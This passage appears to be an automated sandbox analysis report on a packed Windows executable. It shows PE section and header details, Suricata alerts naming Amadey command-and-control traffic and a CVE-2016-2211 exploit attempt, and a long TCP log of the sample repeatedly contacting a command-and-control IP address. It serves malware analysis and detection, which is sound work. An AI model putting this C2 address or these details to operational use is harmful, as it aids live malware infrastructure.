                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or al, 80h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add eax, 0000000Ah
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4cdc1c0x10etmksbbt
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4cdbcc0x18etmksbbt
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2de00837d4004497acf47a949832b2b516f3bFalse0.9973284230245232data7.979174049479235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200f0ebcd8b851d264baff6e4a1fe2ebfe5False0.583984375data4.5213398196219154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2bb0000x2007cc8aeb4594ec064fae4e8fef6034e13unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    etmksbbt0x3260000x1a80000x1a7e0070ad7bb7edf340d073d078bfeda46580False0.9945282549395459data7.953652307689506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    iosnleeh0x4ce0000x10000x4005edd199957207b670bde157329d2fde1False0.8134765625data6.245417276981024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4cf0000x30000x2200856f329ab316ef634c85a6f2f3158669False0.06721047794117647DOS executable (COM)0.7663652277382772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4cdc2c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-26T21:02:19.708198+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970040.68.123.157192.168.2.7
                    2024-07-26T21:02:41.265101+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34971080192.168.2.7185.215.113.16
                    2024-07-26T21:02:33.652832+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970480192.168.2.7185.215.113.16
                    2024-07-26T21:02:58.425645+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972540.68.123.157192.168.2.7
                    2024-07-26T21:02:37.109665+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970780192.168.2.7185.215.113.16
                    2024-07-26T21:02:46.154334+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34971480192.168.2.7185.215.113.16
                    2024-07-26T21:02:38.302527+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970880192.168.2.7185.215.113.16

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 21:02:32.892640114 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:32.898819923 CEST8049704185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:32.898927927 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:32.899399996 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:32.908510923 CEST8049704185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:33.652673960 CEST8049704185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:33.652832031 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:33.655378103 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:33.662039042 CEST8049704185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:33.909362078 CEST8049704185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:33.909437895 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.019987106 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.020279884 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.029031992 CEST8049705185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:34.029107094 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.029411077 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.030637026 CEST8049704185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:34.030684948 CEST4970480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.038165092 CEST8049705185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:34.798254967 CEST8049705185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:34.798579931 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.799381018 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:34.808465004 CEST8049705185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:35.084516048 CEST8049705185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:35.084651947 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.190809011 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.191092968 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.197216988 CEST8049706185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:35.197292089 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.197519064 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.198544025 CEST8049705185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:35.198595047 CEST4970580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.202281952 CEST8049706185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:35.959119081 CEST8049706185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:35.959264040 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.960216045 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:35.965120077 CEST8049706185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:36.207797050 CEST8049706185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:36.207890987 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:36.315762043 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:36.316076994 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:36.320966959 CEST8049707185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:36.321036100 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:36.321181059 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:36.322506905 CEST8049706185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:36.322554111 CEST4970680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:36.326389074 CEST8049707185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:37.109564066 CEST8049707185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:37.109664917 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.110645056 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.117197990 CEST8049707185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:37.363233089 CEST8049707185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:37.363315105 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.473442078 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.474704981 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.482933044 CEST8049708185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:37.483045101 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.483225107 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.484132051 CEST8049707185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:37.484190941 CEST4970780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:37.488030910 CEST8049708185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:38.302417040 CEST8049708185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:38.302526951 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.303411007 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.308959007 CEST8049708185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:38.560709953 CEST8049708185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:38.560848951 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.675167084 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.675411940 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.680565119 CEST8049708185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:38.680680990 CEST4970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.680716038 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:38.680788040 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.680986881 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:38.686108112 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.120673895 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.120877981 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.121546984 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.121613026 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.121624947 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.122200966 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.122247934 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.127836943 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.383377075 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.383469105 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.487528086 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.487898111 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.492801905 CEST8049710185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.492918968 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.493055105 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.493098974 CEST8049709185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:40.493144035 CEST4970980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:40.498020887 CEST8049710185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:41.264971972 CEST8049710185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:41.265100956 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.278851986 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.283828020 CEST8049710185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:41.530005932 CEST8049710185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:41.530127048 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.645736933 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.646158934 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.651454926 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:41.651559114 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.651669025 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.654196978 CEST8049710185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:41.654263973 CEST4971080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:41.656446934 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:42.404449940 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:42.404671907 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:42.405474901 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:42.411916971 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:42.992793083 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:42.992883921 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:42.996925116 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:42.996983051 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.097002029 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.097280979 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.102415085 CEST8049712185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:43.102498055 CEST8049711185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:43.102518082 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.102559090 CEST4971180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.102674961 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.107681036 CEST8049712185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:43.896238089 CEST8049712185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:43.896322012 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.897070885 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:43.903424978 CEST8049712185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:44.151859999 CEST8049712185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:44.151949883 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:44.253237009 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:44.253552914 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:44.258500099 CEST8049713185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:44.258600950 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:44.258765936 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:44.259284973 CEST8049712185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:44.259344101 CEST4971280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:44.264342070 CEST8049713185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:45.010471106 CEST8049713185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:45.010554075 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.011152983 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.016032934 CEST8049713185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:45.285676956 CEST8049713185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:45.285748959 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.394193888 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.394480944 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.399439096 CEST8049714185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:45.399533987 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.400234938 CEST8049713185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:45.400290012 CEST4971380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.402669907 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:45.407614946 CEST8049714185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:46.154237032 CEST8049714185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:46.154334068 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.154984951 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.159974098 CEST8049714185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:46.403369904 CEST8049714185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:46.403449059 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.518690109 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.518986940 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.524384022 CEST8049715185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:46.524451017 CEST8049714185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:46.524496078 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.524507046 CEST4971480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.524625063 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:46.529805899 CEST8049715185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:47.281588078 CEST8049715185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:47.281862020 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.282552958 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.287760973 CEST8049715185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:47.532128096 CEST8049715185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:47.532341003 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.644047976 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.644283056 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.652230024 CEST8049716185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:47.652333021 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.652462006 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.654421091 CEST8049715185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:47.654470921 CEST4971580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:47.658802032 CEST8049716185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:48.402504921 CEST8049716185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:48.402606964 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.403135061 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.408191919 CEST8049716185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:48.655883074 CEST8049716185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:48.655992031 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.773130894 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.773130894 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.778281927 CEST8049717185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:48.778362036 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.778496981 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.784847021 CEST8049716185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:48.784917116 CEST4971680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:48.785968065 CEST8049717185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:49.623302937 CEST8049717185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:49.623423100 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:49.661458969 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:49.667562962 CEST8049717185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:49.961575031 CEST8049717185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:49.961672068 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.081440926 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.081818104 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.086689949 CEST8049718185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:50.086754084 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.086934090 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.087146044 CEST8049717185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:50.087194920 CEST4971780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.092034101 CEST8049718185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:50.846751928 CEST8049718185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:50.846843958 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.849395037 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:50.854372025 CEST8049718185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:51.127945900 CEST8049718185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:51.128037930 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:51.237845898 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:51.238272905 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:51.243211985 CEST8049719185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:51.243292093 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:51.243341923 CEST8049718185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:51.243380070 CEST4971880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:51.243587017 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:51.248565912 CEST8049719185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:52.146954060 CEST8049719185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:52.147077084 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.152183056 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.157115936 CEST8049719185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:52.403475046 CEST8049719185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:52.403665066 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.650918961 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.651308060 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.656245947 CEST8049720185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:52.656353951 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.656507015 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.657048941 CEST8049719185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:52.657093048 CEST4971980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:52.662827969 CEST8049720185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:53.470457077 CEST8049720185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:53.470562935 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.471230984 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.476399899 CEST8049720185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:53.723408937 CEST8049720185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:53.723545074 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.831537962 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.831990957 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.837023973 CEST8049721185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:53.837168932 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.837369919 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.837922096 CEST8049720185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:53.837986946 CEST4972080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:53.842139006 CEST8049721185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:54.591595888 CEST8049721185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:54.591715097 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.592535019 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.597434044 CEST8049721185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:54.841486931 CEST8049721185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:54.841614008 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.956960917 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.957755089 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.962724924 CEST8049721185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:54.962791920 CEST8049722185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:54.963012934 CEST4972180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.963133097 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.963391066 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:54.968364954 CEST8049722185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:55.781362057 CEST8049722185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:55.781625032 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:55.782612085 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:55.787781954 CEST8049722185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:56.039480925 CEST8049722185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:56.039655924 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.147464991 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.147865057 CEST4972380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.152848005 CEST8049723185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:56.152937889 CEST4972380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.153074980 CEST4972380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.159558058 CEST8049722185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:56.159627914 CEST4972280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.162472010 CEST8049723185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:56.905339956 CEST8049723185.215.113.16192.168.2.7
                    Jul 26, 2024 21:02:56.905436039 CEST4972380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:02:56.906295061 CEST4972380192.168.2.7185.215.113.16
